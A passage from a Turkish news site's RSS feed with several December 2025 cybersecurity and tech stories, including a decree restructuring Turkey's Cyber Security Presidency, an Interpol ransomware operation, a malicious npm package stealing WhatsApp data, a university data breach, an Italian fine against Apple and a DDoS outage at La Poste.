<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>siber güvenlik başkanlığı kararnamesi, dijital devlet mimarisi düzenlemesi, kamu yapay zeka genel müdürlüğü, siber güvenlik kadro değişikliği</media:keywords>
<content:encoded><![CDATA[<p><br>Siber Güvenlik Başkanlığına ilişkin düzenlemelerde değişiklik öngören <strong data-start="513" data-end="545">Cumhurbaşkanlığı Kararnamesi</strong>, 25 Aralık 2025 tarihli Resmî Gazete’de yayımlanarak yürürlüğe girdi. Kararname ile başkanlığın görev, yetki ve teşkilat yapısında önemli değişiklikler yapıldı.</p>
<p></p>
<p data-start="746" data-end="1136"><strong data-start="746" data-end="775">Görev Tanımı Genişletildi</strong><br>Kararnameye göre Siber Güvenlik Başkanlığı, <strong data-start="820" data-end="896">siber güvenlik ve dijital devlet alanında mevzuat çalışmalarını yürütmek</strong>, ulusal strateji ve eylem planlarını hazırlamak ve uygulanmasını koordine etmekle görevlendirildi. Ulusal ve uluslararası düzenlemelere uyum sağlanması ile ilgili kurumlar arası koordinasyon da başkanlığın sorumlulukları arasında yer aldı.</p>
<p data-start="1138" data-end="1519"><strong data-start="1138" data-end="1185">Dijital Devlet ve Veri Standartları Vurgusu</strong><br>Düzenleme kapsamında başkanlığa, <strong data-start="1219" data-end="1267">dijital devlet kurumsal mimarisini oluşturma</strong>, kamu kurumlarının geliştireceği bilişim ürün ve hizmetlerine ilişkin idari, mali ve teknik ilkeleri belirleme yetkisi verildi. Ayrıca kamu projelerinde kullanılacak verilerin kalite kriterleri ve standartlarının belirlenmesi de görev alanına eklendi.</p>
<p data-start="1521" data-end="1818"><strong data-start="1521" data-end="1559">Teşkilat Yapısı Yeniden Düzenlendi</strong><br>Kararname ile başkanlığın teşkilat yapısı; başkan, üç başkan yardımcısı ve hizmet birimleri şeklinde yeniden tanımlandı. Başkanlığın yurt içinde temsilcilik kurabilmesine ve yurt dışı teşkilatlanmaya yetkili olmasına ilişkin hükümler de düzenlemede yer aldı.</p>
<p data-start="1820" data-end="2140"><strong data-start="1820" data-end="1854">Yeni Genel Müdürlükler Kuruldu</strong><br>Yapılan değişiklikle <strong data-start="1876" data-end="1911">Kamu Yapay Zekâ Genel Müdürlüğü</strong>, <strong data-start="1913" data-end="1947">Dijital Devlet Genel Müdürlüğü</strong>, <strong data-start="1949" data-end="1987">Yönetim Hizmetleri Genel Müdürlüğü</strong> ve <strong data-start="1991" data-end="2033">Strateji Geliştirme Dairesi Başkanlığı</strong> başkanlık bünyesine eklendi. Mevcut bazı birimler ise yürürlükten kaldırılarak yeni yapıya entegre edildi.</p>
<p data-start="2142" data-end="2451"><strong data-start="2142" data-end="2173">Kadrolar Yeniden Belirlendi</strong><br>Kararnamenin ekinde yer alan listeyle Siber Güvenlik Başkanlığının merkez teşkilatına ait kadrolar yeniden düzenlendi. Başkan, başkan yardımcıları, genel müdürler, daire başkanları ve teknik personel dahil olmak üzere çok sayıda unvan için derece ve adetler yeniden tanımlandı.</p>
<p data-start="2453" data-end="2566">Cumhurbaşkanı Recep Tayyip Erdoğan tarafından imzalanan kararname, yayımlandığı tarih itibarıyla yürürlüğe girdi.</p>
<p data-start="2568" data-end="2720"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Interpol Liderliğinde Küresel Operasyon: 6 Fidye Yazılımı Çözüldü, Yüzlerce Siber Suçlu Yakalandı</title>
<link>https://www.ajansexpres.com.tr/interpol-liderliginde-kuresel-operasyon-6-fidye-yazilimi-coezuldu-yuzlerce-siber-suclu-yakalandi</link>
<guid>https://www.ajansexpres.com.tr/interpol-liderliginde-kuresel-operasyon-6-fidye-yazilimi-coezuldu-yuzlerce-siber-suclu-yakalandi</guid>
<description><![CDATA[ Interpol koordinasyonunda yürütülen Operation Sentinel kapsamında 19 ülkede eş zamanlı operasyonlar düzenlendi. Çalışmalar sonucunda altı farklı fidye yazılımı türü çözüldü, 574 kişi gözaltına alındı ve siber suçlarla bağlantılı milyonlarca dolarlık varlık ele geçirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b7f51954.webp" length="22346" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:36 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>interpol operation sentinel nedir, fidye yazılımı şifre çözme operasyonu, uluslararası siber suç operasyonu, interpol siber suç tutuklamaları</media:keywords>
<content:encoded><![CDATA[<p><br>Interpol, <strong data-start="428" data-end="450">Operation Sentinel</strong> adı verilen uluslararası bir girişim kapsamında, fidye yazılımı, iş e-postası ele geçirme ve şantaj vakalarına yönelik geniş çaplı bir operasyon yürütüldüğünü açıkladı. <strong data-start="620" data-end="640">27 Ekim–27 Kasım</strong> tarihleri arasında gerçekleştirilen çalışmalarda, <strong data-start="691" data-end="723">19 ülkeden kolluk kuvvetleri</strong> görev aldı.</p>
<p></p>
<p data-start="737" data-end="1070">Interpol tarafından paylaşılan bilgilere göre, operasyon kapsamında <strong data-start="805" data-end="837">574 şüpheli gözaltına alındı</strong>, <strong data-start="839" data-end="857">3 milyon dolar</strong> değerinde suç geliri ele geçirildi ve <strong data-start="896" data-end="931">6 binden fazla zararlı bağlantı</strong> etkisiz hâle getirildi. İncelenen siber suç dosyalarının, toplamda <strong data-start="999" data-end="1040">21 milyon doları aşan mali kayıplarla</strong> bağlantılı olduğu belirtildi.</p>
<p data-start="1072" data-end="1330"><strong data-start="1072" data-end="1103">Altı Fidye Yazılımı Çözüldü</strong><br>Interpol, teknik analizler sonucunda <strong data-start="1141" data-end="1217">altı farklı fidye yazılımı varyantı için şifre çözme imkânı sağlandığını</strong> duyurdu. Bu sayede, saldırıya uğrayan kurumların önemli bir bölümünde verilerin geri kazanılabildiği kaydedildi.</p>
<p data-start="1332" data-end="1599"><strong data-start="1332" data-end="1368">Afrika’da Öne Çıkan Operasyonlar</strong><br>Interpol, Operation Sentinel kapsamında Afrika ülkelerinde elde edilen bazı somut sonuçları paylaştı. Senegal’de bir petrol şirketini hedef alan <strong data-start="1514" data-end="1553">7,9 milyon dolarlık BEC havalesinin</strong> hesaplar dondurularak durdurulduğu açıklandı.</p>
<p data-start="1601" data-end="1907">Gana’da bir finans kuruluşuna yönelik fidye yazılımı saldırısında <strong data-start="1667" data-end="1698">100 TB verinin şifrelendiği</strong>, kolluk kuvvetlerinin zararlıyı analiz ederek <strong data-start="1745" data-end="1779">şifre çözme aracı geliştirdiği</strong> ve <strong data-start="1783" data-end="1813">30 TB verinin kurtarıldığı</strong> bildirildi. Bu olayla bağlantılı olarak birden fazla kişinin gözaltına alındığı ifade edildi.</p>
<p data-start="1909" data-end="2220">Gana ve Nijerya’da, tanınmış fast-food markalarını taklit eden sınır ötesi bir dolandırıcılık operasyonunda <strong data-start="2017" data-end="2082">200’den fazla mağdurun 400 bin dolardan fazla zarara uğradığı</strong>, operasyon sonucunda <strong data-start="2104" data-end="2133">10 şüphelinin yakalandığı</strong>, <strong data-start="2135" data-end="2176">100’den fazla cihazın ele geçirildiği</strong> ve <strong data-start="2180" data-end="2208">30 sunucunun kapatıldığı</strong> belirtildi.</p>
<p data-start="2222" data-end="2594">Benin’de <strong data-start="2231" data-end="2265">106 kişinin gözaltına alındığı</strong>, <strong data-start="2267" data-end="2306">43 zararlı alan adının kaldırıldığı</strong> ve <strong data-start="2310" data-end="2384">4 bin 318 dolandırıcılıkla ilişkili sosyal medya hesabının kapatıldığı</strong> açıklandı. Kamerun’da ise çevrim içi araç satış dolandırıcılığına hızlı müdahale edilerek <strong data-start="2475" data-end="2517">ele geçirilmiş bir sunucuya ulaşıldığı</strong> ve saatler içinde <strong data-start="2536" data-end="2572">acil banka hesap dondurma işlemi</strong> yapıldığı bildirildi.</p>
<p data-start="2596" data-end="2961"><strong data-start="2596" data-end="2618">Interpol’den Uyarı</strong><br>Interpol Siber Suç Direktörü <strong data-start="2648" data-end="2663">Neal Jetton</strong>, “Afrika genelinde siber saldırıların ölçeği ve karmaşıklığı hızla artıyor, özellikle finans ve enerji gibi kritik sektörler hedef alınıyor.” dedi. Jetton, Operation Sentinel sonuçlarının, bölgedeki kolluk kuvvetlerinin uluslararası iş birliği konusundaki kararlılığını ortaya koyduğunu vurguladı.</p>
<p data-start="2963" data-end="3301"><strong data-start="2963" data-end="2986">Özel Sektör Desteği</strong><br>Operasyona <strong data-start="2998" data-end="3084">Team Cymru, The Shadowserver Foundation, Trend Micro, TRM Labs ve Uppsala Security</strong> gibi özel sektör kuruluşlarının da destek verdiği açıklandı. Bu firmaların, fidye yazılımı ve şantaj saldırılarında kullanılan IP adreslerinin izlenmesi ve suç gelirlerinin dondurulmasında katkı sağladığı belirtildi.</p>
<p data-start="3303" data-end="3699">Interpol, daha önce Ağustos ayında yürütülen <strong data-start="3348" data-end="3365">Serengeti 2.0</strong> operasyonunda <strong data-start="3380" data-end="3414">1.209 şüphelinin yakalandığını</strong>, <strong data-start="3416" data-end="3454">97,4 milyon doların kurtarıldığını</strong> ve <strong data-start="3458" data-end="3511">11 binden fazla zararlı altyapının çökertildiğini</strong> hatırlattı. Mart ayında düzenlenen <strong data-start="3547" data-end="3569">Operation Red Card</strong> kapsamında ise <strong data-start="3585" data-end="3619">306 kişinin gözaltına alındığı</strong> ve binlerce mağduru hedef alan dolandırıcılık ağlarının dağıtıldığı kaydedildi.</p>
<p data-start="3701" data-end="3857"><strong data-start="3701" data-end="3713"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Zararlı NPM Paketi WhatsApp Hesaplarını Ele Geçiriyor: Mesajlar ve Kişiler Sızdırılıyor</title>
<link>https://www.ajansexpres.com.tr/zararli-npm-paketi-whatsapp-hesaplarini-ele-geciriyor-mesajlar-ve-kisiler-sizdiriliyor</link>
<guid>https://www.ajansexpres.com.tr/zararli-npm-paketi-whatsapp-hesaplarini-ele-geciriyor-mesajlar-ve-kisiler-sizdiriliyor</guid>
<description><![CDATA[ NPM deposunda yer alan ve WhatsApp Web API kütüphanesi gibi görünen zararlı bir paket, kullanıcıların WhatsApp hesaplarına erişerek mesajları, kişileri ve medya dosyalarını çalıyor. Güvenlik araştırmacıları, altı aydır yayında olan paketin on binlerce kez indirildiğini açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b8486808.webp" length="54638" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:34 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>zararlı npm paketi nedir, lotusbail whatsapp hırsızlığı, npm tedarik zinciri saldırısı, whatsapp web api malware</media:keywords>
<content:encoded><![CDATA[<p><br>Node Package Manager (NPM) kayıtlarında bulunan <strong data-start="464" data-end="479">“lotusbail”</strong> adlı zararlı bir paketin, WhatsApp Web API kütüphanesi gibi davranarak <strong data-start="551" data-end="589">WhatsApp hesaplarını ele geçirdiği</strong> ortaya çıktı. Tedarik zinciri güvenlik şirketi <strong data-start="637" data-end="653">Koi Security</strong> tarafından yapılan analize göre, paket popüler <strong data-start="701" data-end="727">WhiskeySockets Baileys</strong> projesinin bir çatallanması olarak sunuluyor ve meşru işlevleri yerine getirirken arka planda kapsamlı veri hırsızlığı gerçekleştiriyor.</p>
<p></p>
<p data-start="866" data-end="1236">Araştırmacılar, lotusbail paketinin en az <strong data-start="908" data-end="950">altı aydır NPM üzerinde yayımlandığını</strong> ve bu süre içinde <strong data-start="969" data-end="1002">56 binden fazla indirildiğini</strong> tespit etti. Paket, WhatsApp oturum anahtarlarını ve kimlik doğrulama token’larını ele geçirmenin yanı sıra <strong data-start="1111" data-end="1164">gönderilen ve alınan tüm mesajları kaydedebiliyor</strong>, kişi listelerini, medya dosyalarını ve belgeleri dışarı aktarabiliyor.</p>
<p data-start="1238" data-end="1643"><strong data-start="1238" data-end="1289">“Tüm Mesaj Trafiği Önce Zararlı Koddan Geçiyor”</strong><br>Koi Security raporunda, “Paket, WhatsApp ile iletişim kuran meşru WebSocket istemcisini sarmalıyor. Uygulamanızdan geçen her mesaj önce zararlının soket sarmalayıcısından geçiyor.” ifadeleri yer aldı. Açıklamada, kimlik doğrulama sırasında kullanıcı bilgilerinin yakalandığı, gelen mesajların dinlendiği ve gönderilen mesajların kaydedildiği vurgulandı.</p>
<p data-start="1645" data-end="1876">Ele geçirilen verilerin, <strong data-start="1670" data-end="1707">özel bir RSA şifreleme uygulaması</strong>, Unicode tabanlı gizleme teknikleri, <strong data-start="1745" data-end="1768">LZString sıkıştırma</strong> ve <strong data-start="1772" data-end="1789">AES şifreleme</strong> gibi çok katmanlı gizleme yöntemleri kullanılarak saldırganlara iletildiği belirtildi.</p>
<p data-start="1878" data-end="2338"><strong data-start="1878" data-end="1921">Kalıcı Erişim Sağlayan Cihaz Eşleştirme</strong><br>Raporda dikkat çeken bir diğer unsurun, zararlı paketin <strong data-start="1978" data-end="2034">WhatsApp cihaz eşleştirme sürecini kötüye kullanması</strong> olduğu ifade edildi. Bu yöntemle saldırganın kendi cihazını mağdurun WhatsApp hesabına bağladığı ve paket sistemden kaldırıldıktan sonra bile <strong data-start="2177" data-end="2211">hesaba kalıcı erişimin sürdüğü</strong> kaydedildi. Erişimin ancak WhatsApp ayarlarından bağlı cihazların manuel olarak kaldırılmasıyla sonlandırılabildiği aktarıldı.</p>
<p data-start="2340" data-end="2624"><strong data-start="2340" data-end="2372">Analizi Zorlaştıran Tuzaklar</strong><br>Koi Security, lotusbail paketinde <strong data-start="2407" data-end="2438">27 adet sonsuz döngü tuzağı</strong> bulunduğunu ve bunun hata ayıklama ile analiz süreçlerini zorlaştırdığını açıkladı. Bu karmaşık yapı sayesinde zararlının uzun süre tespit edilmeden yayında kalabildiği değerlendirildi.</p>
<p data-start="2626" data-end="3072"><strong data-start="2626" data-end="2658">Geliştiricilere Kritik Uyarı</strong><br>Uzmanlar, lotusbail paketini kullanan geliştiricilerin derhal paketi sistemlerinden kaldırmalarını ve <strong data-start="2761" data-end="2823">WhatsApp hesaplarındaki bağlı cihazları kontrol etmelerini</strong> önerdi. Koi Security, yalnızca kaynak kodu incelemenin yeterli olmadığını, yeni bağımlılıkların <strong data-start="2920" data-end="2954">çalışma zamanı davranışlarının</strong>, özellikle kimlik doğrulama sırasında oluşan beklenmedik ağ bağlantılarının yakından izlenmesi gerektiğini vurguladı.</p>
<p data-start="3074" data-end="3201"><strong data-start="3074" data-end="3086"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>ABD’de Baker University 2024 Veri İhlalini Açıkladı: 53 Binden Fazla Kişinin Bilgileri Etkilendi</title>
<link>https://www.ajansexpres.com.tr/abdde-baker-university-2024-veri-ihlalini-acikladi-53-binden-fazla-kisinin-bilgileri-etkilendi</link>
<guid>https://www.ajansexpres.com.tr/abdde-baker-university-2024-veri-ihlalini-acikladi-53-binden-fazla-kisinin-bilgileri-etkilendi</guid>
<description><![CDATA[ Kansas eyaletinde bulunan Baker University, Aralık 2024’te yaşanan bir siber saldırı sonucu 53 bin 624 kişinin kişisel, sağlık ve finansal bilgilerinin ele geçirildiğini duyurdu. Üniversite, saldırganların haftalarca sistemlere erişim sağladığını açıkladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b6e035a4.webp" length="93342" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:26 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>baker university veri ihlali nedir, abd üniversiteleri siber saldırı, öğrenci bilgileri sızdırıldı mı, 2024 eğitim sektörü veri ihlalleri</media:keywords>
<content:encoded><![CDATA[<p><br>ABD’nin Kansas eyaletinde faaliyet gösteren <strong data-start="446" data-end="466">Baker University</strong>, 2024 yılında yaşanan bir siber saldırıya ilişkin veri ihlali bildiriminde bulundu. Üniversite yönetimi, saldırganların kurum ağına izinsiz erişerek <strong data-start="616" data-end="697">kişisel, sağlık ve finansal bilgileri içeren hassas belgeleri ele geçirdiğini</strong> açıkladı.</p>
<p></p>
<p data-start="709" data-end="1113">1858 yılında kurulan ve Baldwin City’de bulunan özel üniversite, yaklaşık <strong data-start="783" data-end="800">2 bin öğrenci</strong> ve <strong data-start="804" data-end="830">300’den fazla çalışanı</strong> ile faaliyet gösteriyor. Baker University, Aralık 2024’te yaşanan bir sistem kesintisinin ardından ağda şüpheli hareketlilik tespit edildiğini ve yapılan incelemede saldırganların <strong data-start="1011" data-end="1038">2 Aralık–19 Aralık 2024</strong> tarihleri arasında sistemlere erişim sağladığının belirlendiğini bildirdi.</p>
<p data-start="1115" data-end="1668"><strong data-start="1115" data-end="1158">“Çok Sayıda Hassas Veri Türü Etkilendi”</strong><br>Üniversite tarafından yayımlanan veri ihlali bildiriminde, “Yapılan inceleme sonucunda Baker University ile ilişkili kişilere ait bilgilerin etkilenmiş olabileceği tespit edildi.” ifadelerine yer verildi. Açıklamada, kişi bazında değişmekle birlikte ele geçirilen veriler arasında <strong data-start="1440" data-end="1646">ad-soyad, doğum tarihi, sürücü belgesi numarası, banka hesap bilgileri, sağlık sigortası ve tıbbi bilgiler, pasaport bilgileri, Sosyal Güvenlik numarası, öğrenci kimlik numarası ve vergi kimlik numarası</strong> bulunduğu kaydedildi.</p>
<p data-start="1670" data-end="1798">Baker University, Maine Başsavcılığı’na yapılan resmi bildirimde, veri ihlalinden <strong data-start="1752" data-end="1774">53 bin 624 kişinin</strong> etkilendiğini açıkladı.</p>
<p data-start="1800" data-end="2140"><strong data-start="1800" data-end="1835">Ücretsiz Kredi Takibi Sunuluyor</strong><br>Üniversite, şu ana kadar ele geçirilen bilgilerin <strong data-start="1886" data-end="1957">dolandırıcılık amacıyla kullanıldığına dair bir kanıt bulunmadığını</strong> belirtti. Buna rağmen etkilenen kişilere <strong data-start="1999" data-end="2032">ücretsiz kredi izleme hizmeti</strong> sunulduğu ve banka hesapları ile kredi raporlarının düzenli olarak kontrol edilmesi tavsiyesinde bulunuldu.</p>
<p data-start="2142" data-end="2508">Baker University Başkanı <strong data-start="2167" data-end="2184">Jody Fournier</strong>, “Baker topluluğunun kişisel bilgilerinin gizliliği ve güvenliği üniversitemizin en yüksek öncelikleri arasında yer alıyor.” dedi. Fournier, olayın ardından üniversitenin bir siber güvenlik firmasıyla birlikte çalıştığını ve saldırı sırasında ele geçirilen ana platformlardan birinin <strong data-start="2469" data-end="2496">yeniden inşa edildiğini</strong> ifade etti.</p>
<p data-start="2510" data-end="2712"><strong data-start="2510" data-end="2544">Saldırının Kaynağı Açıklanmadı</strong><br>Üniversite yönetimi, saldırının türüne ilişkin detay paylaşmazken, olayın <strong data-start="2619" data-end="2702">belirli bir siber suç grubu veya devlet destekli aktörle ilişkilendirilmediğini</strong> bildirdi.</p>
<p data-start="2714" data-end="3176">Son dönemde ABD’de başka üniversitelerin de benzer saldırılara maruz kaldığına dikkat çekildi. Harvard University, Princeton University ve Pennsylvania Üniversitesi, <strong data-start="2880" data-end="2912">sesli kimlik avı saldırıları</strong> sonucu öğrenci, mezun, bağışçı ve personel bilgilerine yetkisiz erişim sağlandığını açıklamıştı. Ayrıca <strong data-start="3017" data-end="3046">Clop fidye yazılımı grubu</strong>, Oracle E-Business Suite platformundaki sıfır gün açığını kullanarak Harvard ve Pennsylvania Üniversitelerinden veri sızdırmıştı.</p>
<p data-start="3178" data-end="3330"><strong data-start="3178" data-end="3190"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>İtalya Rekabet Kurumu Apple’a App Store Gizlilik Politikası Nedeniyle 116 Milyon Dolar Ceza Kesti</title>
<link>https://www.ajansexpres.com.tr/italya-rekabet-kurumu-applea-app-store-gizlilik-politikasi-nedeniyle-116-milyon-dolar-ceza-kesti</link>
<guid>https://www.ajansexpres.com.tr/italya-rekabet-kurumu-applea-app-store-gizlilik-politikasi-nedeniyle-116-milyon-dolar-ceza-kesti</guid>
<description><![CDATA[ İtalya Rekabet Kurumu AGCM, Apple’ın App Tracking Transparency çerçevesini kullanarak mobil reklam pazarındaki hâkim konumunu kötüye kullandığı gerekçesiyle şirkete 98,6 milyon avro para cezası verdi. Karar, iki yıl süren soruşturmanın ardından açıklandı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b68abd0a.webp" length="12984" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:25 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>italya apple cezası nedir, app tracking transparency rekabet ihlali, apple att gizlilik politikası, avrupa apple antitröst soruşturması</media:keywords>
<content:encoded><![CDATA[<p><br>İtalya Rekabet Kurumu <strong data-start="424" data-end="432">AGCM</strong>, Apple’ın <strong data-start="443" data-end="478">App Tracking Transparency (ATT)</strong> gizlilik çerçevesini rekabeti kısıtlayıcı şekilde uyguladığı sonucuna vararak şirkete <strong data-start="565" data-end="585">98,6 milyon avro</strong>, yaklaşık <strong data-start="596" data-end="616">116 milyon dolar</strong> para cezası verdi. Karar, pazartesi günü yayımlanan basın açıklamasıyla kamuoyuna duyuruldu.</p>
<p></p>
<p data-start="711" data-end="1005">ATT sistemi, uygulama geliştiricilerin kullanıcıları başka şirketlere ait uygulama ve web siteleri genelinde takip edebilmesi için <strong data-start="842" data-end="864">açık rıza almasını</strong> zorunlu kılıyor. Apple, bu sistemi Haziran 2020’de tanıtmış, <strong data-start="926" data-end="953">iOS 14.5 ve iPadOS 14.5</strong> sürümleriyle Nisan 2021’de zorunlu hâle getirmişti.</p>
<p data-start="1007" data-end="1372"><strong data-start="1007" data-end="1045">“Üçüncü Taraflara Çifte Onay Yükü”</strong><br>AGCM açıklamasında, Apple’ın ATT kapsamında <strong data-start="1090" data-end="1178">üçüncü taraf uygulamalara standart bir izin penceresi gösterme zorunluluğu getirdiği</strong>, ancak <strong data-start="1186" data-end="1250">kendi uygulama ve hizmetlerini bu zorunluluktan muaf tuttuğu</strong> belirtildi. Kurum, bu uygulamanın geliştiricileri aynı amaç için <strong data-start="1316" data-end="1362">iki kez kullanıcı onayı almaya zorladığını</strong> kaydetti.</p>
<p data-start="1374" data-end="1701">Düzenleyici kurum, ATT izin penceresinin <strong data-start="1415" data-end="1453">AB Genel Veri Koruma Tüzüğü (GDPR)</strong> gerekliliklerini tek başına karşılamadığını, bu nedenle geliştiricilerin ayrıca kendi rıza mekanizmalarını sunmak zorunda kaldığını bildirdi. Bu durumun, rekabet açısından <strong data-start="1626" data-end="1677">“aşırı derecede külfetli bir çifte onay süreci”</strong> yarattığı ifade edildi.</p>
<p data-start="1703" data-end="2051"><strong data-start="1703" data-end="1747">“Daha Az Kısıtlayıcı Yöntemler Mümkündü”</strong><br>AGCM, Veri Koruma Otoritesi’nin görüşüne de atıf yaparak, Apple’ın kullanıcı gizliliğini aynı seviyede koruyacak <strong data-start="1861" data-end="1903">daha az rekabeti sınırlayıcı yöntemler</strong> uygulayabileceğini vurguladı. Açıklamada, bu yaklaşımın üçüncü taraf geliştiricilere tek taraflı ek yükler getirilmesini önleyebileceği belirtildi.</p>
<p data-start="2053" data-end="2374"><strong data-start="2053" data-end="2083">Apple Karara İtiraz Edecek</strong><br>Apple, AGCM’nin kararına itiraz edeceğini açıkladı. Şirket, yaptığı açıklamada, “Gizliliğin temel bir insan hakkı olduğuna inanıyoruz. App Tracking Transparency’yi, kullanıcıların uygulamalar arası takip edilip edilmemesine kolayca karar verebilmesi için geliştirdik.” ifadelerini kullandı.</p>
<p data-start="2376" data-end="2667">Apple, ATT kurallarının <strong data-start="2400" data-end="2454">tüm geliştiriciler için eşit şekilde uygulandığını</strong>, kullanıcılar tarafından benimsendiğini ve dünya genelinde gizlilik savunucularından destek gördüğünü savundu. Şirket, kararı temyize götürürken <strong data-start="2600" data-end="2657">güçlü gizlilik korumalarını savunmaya devam edeceğini</strong> bildirdi.</p>
<p data-start="2669" data-end="3015"><strong data-start="2669" data-end="2711">Avrupa’da Benzer Soruşturmalar Sürüyor</strong><br>Apple, Nisan ayında da Fransa rekabet otoritesi tarafından ATT uygulaması nedeniyle <strong data-start="2796" data-end="2815">150 milyon avro</strong> para cezasına çarptırılmıştı. Benzer soruşturmaların <strong data-start="2869" data-end="2896">Polonya’da devam ettiği</strong>, Almanya’da ise Apple’ın düzenleyici talepler doğrultusunda <strong data-start="2957" data-end="3001">ATT izin penceresinde değişiklik yaptığı</strong> hatırlatıldı.</p>
<p data-start="3017" data-end="3167"><strong data-start="3017" data-end="3029"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Fransa’da Siber Saldırı Krizi: La Poste’nin Posta ve Bankacılık Sistemleri Ülke Genelinde Devre Dışı</title>
<link>https://www.ajansexpres.com.tr/fransada-siber-saldiri-krizi-la-postenin-posta-ve-bankacilik-sistemleri-ulke-genelinde-devre-disi</link>
<guid>https://www.ajansexpres.com.tr/fransada-siber-saldiri-krizi-la-postenin-posta-ve-bankacilik-sistemleri-ulke-genelinde-devre-disi</guid>
<description><![CDATA[ Fransa’nın ulusal posta hizmeti La Poste, büyük bir ağ olayı nedeniyle tüm bilgi sistemlerinin çevrim dışı kaldığını açıkladı. Siber saldırı sonucu dijital bankacılık, mobil uygulamalar ve çevrim içi hizmetler aksarken, milyonlarca müşteri geçici erişim sorunlarıyla karşı karşıya kaldı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202512/image_870x580_694d0b6316cca.webp" length="54444" type="image/jpeg"/>
<pubDate>Thu, 25 Dec 2025 13:04:23 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>fransa la poste siber saldırı nedir, la poste ddos saldırısı iddiası, fransa bankacılık sistemleri kesinti, la banque postale online hizmetler</media:keywords>
<content:encoded><![CDATA[<p><br>Fransa’nın kamuya ait ulusal posta kurumu <strong data-start="479" data-end="491">La Poste</strong>, pazartesi günü yaptığı açıklamada, “büyük bir ağ olayı” nedeniyle tüm bilgi sistemlerinin devre dışı kaldığını duyurdu. Olayın, ülke genelinde <strong data-start="636" data-end="698">posta, bankacılık ve dijital hizmetlerde ciddi kesintilere</strong> yol açtığı bildirildi.</p>
<p></p>
<p data-start="723" data-end="1065">La Poste, sosyal medya üzerinden yaptığı bilgilendirmede; <strong data-start="781" data-end="888">resmî internet sitesi, mobil uygulaması, dijital kimlik hizmeti ve Digiposte belge saklama platformunun</strong> geçici olarak erişilemez hâle geldiğini açıkladı. Kesintinin ardından bazı postanelerde hizmet aksamaları yaşandığı, ancak gişelerden temel işlemlerin yapılabildiği belirtildi.</p>
<p data-start="1067" data-end="1371"><strong data-start="1067" data-end="1112">“Temel Bankacılık İşlemleri Devam Ediyor”</strong><br>La Poste, bankacılık müşterileri için <strong data-start="1151" data-end="1202">SMS doğrulamasıyla çevrim içi kart ödemelerinin</strong> sürdüğünü açıkladı. Açıklamada, “ATM’lerden para çekme, mağaza içi POS kart ödemeleri ve WERO üzerinden yapılan transferler kullanılabilir durumda.” ifadeleri yer aldı.</p>
<p data-start="1373" data-end="1637">Groupe La Poste bünyesinde faaliyet gösteren <strong data-start="1418" data-end="1439">La Banque Postale</strong> de çevrim içi ve mobil bankacılık hizmetlerinin kesintiye uğradığını doğruladı. Banka yetkilileri, “Ödemeler, bankalar arası işlemler ve akış yönetimi normal şekilde çalışıyor.” bilgisini paylaştı.</p>
<p data-start="1639" data-end="1932"><strong data-start="1639" data-end="1678">Web Siteleri Saatlerce Kapalı Kaldı</strong><br>Haberin yayımlandığı saatlerde La Poste’un ana internet sitesinin hâlâ kapalı olduğu, kullanıcıların webmail ve Digiposte platformlarına yönlendirildiği görüldü. Yetkililer, hizmetlerin ne zaman tamamen normale döneceğine dair net bir takvim paylaşmadı.</p>
<p data-start="1934" data-end="2216"><strong data-start="1934" data-end="1960">DDoS Saldırısı İddiası</strong><br>La Poste olayın teknik detaylarını açıklamazken, Fransız basınında yer alan haberlerde kesintinin <strong data-start="2059" data-end="2108">dağıtık hizmet engelleme (DDoS) saldırısından</strong> kaynaklandığı öne sürüldü. Saldırının, La Poste’nin ülke genelindeki operasyonlarını etkilediği bildirildi.</p>
<p data-start="2218" data-end="2393">La Poste, <strong data-start="2228" data-end="2257">250 binden fazla çalışanı</strong> bulunan ve posta, kargo, bankacılık, sigorta ve mobil iletişim hizmetleri sunan <strong data-start="2338" data-end="2357">Groupe La Poste</strong> çatısı altında faaliyet gösteriyor.</p>
<p data-start="2395" data-end="2743"><strong data-start="2395" data-end="2432">Son Dönemde Artan Siber Tehditler</strong><br>Yaşanan olay, Fransız makamlarının kısa süre önce <strong data-start="2483" data-end="2620">İçişleri Bakanlığı e-posta sunucularına yönelik bir siber saldırıyla bağlantılı olarak 22 yaşındaki bir şüpheliyi gözaltına almasının</strong> ardından geldi. Uzmanlar, kritik kamu hizmetlerini hedef alan siber saldırıların ülkede artış gösterdiğine dikkat çekiyor.</p>
<p data-start="2745" data-end="2902"><strong data-start="2745" data-end="2757"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Chrome Web Store’da Zararlı Uzantı Alarmı: Phantom Shuttle Kullanıcı Bilgilerini Sessizce Çalıyor</title>
<link>https://www.ajansexpres.com.tr/chrome-web-storeda-zararli-uzanti-alarmi-phantom-shuttle-kullanici-bilgilerini-sessizce-caliyor</link>
<guid>https://www.ajansexpres.com.tr/chrome-web-storeda-zararli-uzanti-alarmi-phantom-shuttle-kullanici-bilgilerini-sessizce-caliyor</guid>
